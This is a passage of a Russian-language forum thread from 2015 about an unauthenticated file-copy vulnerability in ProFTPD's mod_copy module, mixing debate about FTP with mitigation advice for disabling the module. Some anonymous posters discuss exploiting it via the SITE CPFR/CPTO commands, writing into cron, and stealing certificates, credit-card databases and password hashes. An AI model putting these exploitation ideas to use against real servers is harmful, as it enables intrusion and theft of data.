Простите, но древнющему говну мамонта а-ля FTP весь этот "функционал" совершенно без надобности. Основное его назначение - дать клиенту, не умеющему ничего другого, спокойно закопировать туда-сюда пару файлов. Для себя же (внутри) проще юзать scp, sftp (не путать с FTPoTLS), rsync и прочее.
Ответить | Правка | ^ к родителю #81 | Наверх | Cообщить модератору

98. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  –1 +/
Сообщение от Nas_tradamus (ok) on 14-Апр-15, 23:08 
> Простите, но древнющему говну мамонта а-ля FTP весь этот "функционал" совершенно без
> надобности. Основное его назначение - дать клиенту, не умеющему ничего другого,
> спокойно закопировать туда-сюда пару файлов. Для себя же (внутри) проще юзать
> scp, sftp (не путать с FTPoTLS), rsync и прочее.

Раз вам не надо - значит и другим не надо. Ясно.

а про scp пацаны-то и не знали...

Ответить | Правка | ^ к родителю #97 | Наверх | Cообщить модератору

99. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от AlexAT (ok) on 14-Апр-15, 23:24 
> Раз вам не надо - значит и другим не надо. Ясно.

Ну надо - хорошо. Поломали в очередной раз - тоже хорошо. Dixi.

Ответить | Правка | ^ к родителю #98 | Наверх | Cообщить модератору

100. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от ALex_hha (ok) on 15-Апр-15, 10:45 
> Простите, но древнющему говну мамонта а-ля FTP весь этот "функционал" совершенно без
> надобности. Основное его назначение - дать клиенту, не умеющему ничего другого,
> спокойно закопировать туда-сюда пару файлов. Для себя же (внутри) проще юзать
> scp, sftp (не путать с FTPoTLS), rsync и прочее.

если вам нужен только ftp, то безусловно, proftpd вам точно не нужен, а хватит vsftpd. Если же вам нужно что то больше, чем банальный ftp, то тут и начинаются проблемы.

Ответить | Правка | ^ к родителю #97 | Наверх | Cообщить модератору

101. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от AlexAT (ok) on 15-Апр-15, 19:34 
> Если же вам нужно что то больше, чем банальный ftp

то лучше FTP вообще не использовать ни под каким соусом.


Ответить | Правка | ^ к родителю #100 | Наверх | Cообщить модератору

102. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Nas_tradamus (ok) on 15-Апр-15, 19:39 
>> Если же вам нужно что то больше, чем банальный ftp
> то лучше FTP вообще не использовать ни под каким соусом.

А как обмениваться многогигабайтными файлами между кучей поставщиков/партнёров/клиентов маленькой фирме?

Ответить | Правка | ^ к родителю #101 | Наверх | Cообщить модератору

103. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от AlexAT (ok) on 15-Апр-15, 19:45 
А теперь найдите в своей фразе взаимоисключающие вещи.

Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

88. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  –2 +/
Сообщение от Nas_tradamus (ok) on 12-Апр-15, 14:01 
> Какая прелесть...
> Блин, счастье, что никогда не рассматривал эту студенческую поделку ака ProFTPD всерьёз.
> Только vsftpd, только хардкор.

Сравните объем кода и функционала у этих двух программ.
Вы только что сделали сравнение вида "postgres vs sqlite", обозвав первый студенческой поделкой.

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

71. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +1 +/
Сообщение от Аноним (??) on 11-Апр-15, 14:34 
На Ubuntu комментируем в /etc/proftpd/modules.conf строку LoadModule mod_copy.c, рестартим proftpd - PROFIT! "500 SITE CPFR" not understood. И кто сказал, что модуль нельзя выключить? Проверено на версии 1.3.5rc3
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

79. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 12-Апр-15, 09:49 
Подскажите, почему при тестирование некоторых серверов с одинаковыми версиями ProFTPD, есть возможность выполнять команды "site cpfr" и "site cpto", а в некоторых их нету. Хотя вроде версии ProFTPD одинаковые.

Это зависит от ОС?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

80. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от ALex_hha (ok) on 12-Апр-15, 12:41 
> Это зависит от ОС?

скорее уж от опций сборки

Ответить | Правка | ^ к родителю #79 | Наверх | Cообщить модератору

90. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 12-Апр-15, 14:52 
Debian Squeeze: ProFTPD версии 1.3.3a, mod_copy там ещё нет.

Debian Wheezy: ProFTPD версии 1.3.4a, mod_copy отключается в /etc/proftpd/modules.conf.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

92. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 13-Апр-15, 19:41 
Проверил на Debiane, да в папку tmp копирует,
НО при копирование в /var/www/ выдает Access denied
:/
Не знаю, как они там скопировали test.php... (
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

93. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Nas_tradamus (ok) on 13-Апр-15, 19:43 
> Проверил на Debiane, да в папку tmp копирует,
> НО при копирование в /var/www/ выдает Access denied
> :/
> Не знаю, как они там скопировали test.php... (

В /tmp может писать любой юзер, потому что. А копирование идёт от юзера, от которого запущено приложение.

Ответить | Правка | ^ к родителю #92 | Наверх | Cообщить модератору

94. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 13-Апр-15, 20:06 
>> Проверил на Debiane, да в папку tmp копирует,
>> НО при копирование в /var/www/ выдает Access denied
>> :/
>> Не знаю, как они там скопировали test.php... (
> В /tmp может писать любой юзер, потому что. А копирование идёт от
> юзера, от которого запущено приложение.

Тогда какие ещё есть мысли на этот счет? Что можно сделать? Используя данную уязвимость, были мысли прописать в крон что-нибудь, но ведь там тоже Access Denied

Ответить | Правка | ^ к родителю #93 | Наверх | Cообщить модератору

95. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  –1 +/
Сообщение от Аноним (??) on 14-Апр-15, 12:37 
>>> Проверил на Debiane, да в папку tmp копирует,
>>> НО при копирование в /var/www/ выдает Access denied
>>> :/
>>> Не знаю, как они там скопировали test.php... (
>> В /tmp может писать любой юзер, потому что. А копирование идёт от
>> юзера, от которого запущено приложение.
> Тогда какие ещё есть мысли на этот счет? Что можно сделать? Используя
> данную уязвимость, были мысли прописать в крон что-нибудь, но ведь там
> тоже Access Denied

ну, например, спереть что душе угодно, от сертефикатов, до баз с кредитками и файликов с хешами паролей...

Ответить | Правка | ^ к родителю #94 | Наверх | Cообщить модератору

96. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (??) on 14-Апр-15, 13:27 
>[оверквотинг удален]
>>>> НО при копирование в /var/www/ выдает Access denied
>>>> :/
>>>> Не знаю, как они там скопировали test.php... (
>>> В /tmp может писать любой юзер, потому что. А копирование идёт от
>>> юзера, от которого запущено приложение.
>> Тогда какие ещё есть мысли на этот счет? Что можно сделать? Используя
>> данную уязвимость, были мысли прописать в крон что-нибудь, но ведь там
>> тоже Access Denied
> ну, например, спереть что душе угодно, от сертефикатов, до баз с кредитками
> и файликов с хешами паролей...

Интересно было бы увидить пример, допустим мы можем копировать файлы, в папку tmp, но как с неё считать их? В

Ответить | Правка | ^ к родителю #95 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру